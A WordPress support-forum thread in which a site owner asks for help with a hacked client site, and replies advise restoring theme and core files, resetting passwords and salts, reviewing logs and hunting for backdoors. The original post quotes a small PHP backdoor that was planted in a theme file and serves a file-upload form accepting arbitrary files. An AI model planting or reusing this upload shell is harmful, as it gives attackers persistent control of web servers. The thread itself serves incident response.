Website possibly hacked?

  • dpanych

    (@dpanych)


    11 years, 8 months ago

    I am updating the styling for a client’s website and it seems to have gotten hacked. When I visit their website they have a File Upload widget in the header and when I would navigate to /wp-admin I get the following error:

    Warning: Cannot modify header information – headers already sent by (output started at /home/***/public_html/wp-content/themes/theme47225/includes/class-tgm-plugin-activation.php:17) in /home/…

    Here is the content inside the class-tgm-plugin-activation.php file:

    <?php
if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
?>

    So I removed the following:

    echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';

    and it seemed to be all fixed. The next day I went to the website and the same thing happened.

    Anyone know how to recover from this?

Viewing 4 replies - 1 through 4 (of 4 total)
  • Moderator t-p

    (@t-p)

    11 years, 8 months ago

    – Try reviewing this codex to solve header already sent problem: http://codex.wordpress.org/FAQ_Troubleshooting#How_do_I_solve_the_Headers_already_sent_warning_problem.3F

    The Hack Repair Guy

    (@tvcnet)

    11 years, 8 months ago

    Someone most definitely added that upload snippet to your page.

    If I were in your situation, I would go back and find the original theme files, remove the existing theme and replace from my virgin backup.

    Changing all related passwords would not hurt either.

    perezbox

    (@perezbox)

    11 years, 8 months ago

    Hi @dpanych

    Replacing your theme will likely do little for you in this case. Often in cases of reinfections the attacker has a means of regaining access to your environment.

    Whether it be via a Backdoor, or via your own WP-Admin controls.

    This is what I would do:

    1 – I would investigate when the changes are happening. You can do this by analyzing your logs to see what events are occurring. Look for log entries that trigger wp-login and / or the editor – you should be able to see this.

    2 – I would purge all accounts of their passwords just in case, there are few different tools to help with this. One such would be the Sucuri plugin: http://wordpress.org/plugins/sucuri-scanner/ There is actually a section in there for post-hacks. It will not only purge the passwords but also reset your salts / keys – an important step many forget to do.

    3 – Once all your controls are set, including FTP, you enter the most difficult section which is trying to identify if a backdoor exists. This, I won’t lie, won’t be easy but a good place to start is here: http://codex.wordpress.org/FAQ_My_site_was_hacked

    Once you get the reinfection to stop at least 48 hours you can feel a little more comfortable in the actions you’ve taken.

    One very simple step is to replace WordPress core files – that is wp-admin / wp-includes and the root files. You should see which those are.

    Happy hunting.

    dpauley1980

    (@dpauley1980)

    11 years, 2 months ago

    I suffered the same hack, when I deleted the same line as him, my page went whiteout. I cannot get back to that page. Can I not fix this now?

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘Website possibly hacked?’ is closed to new replies.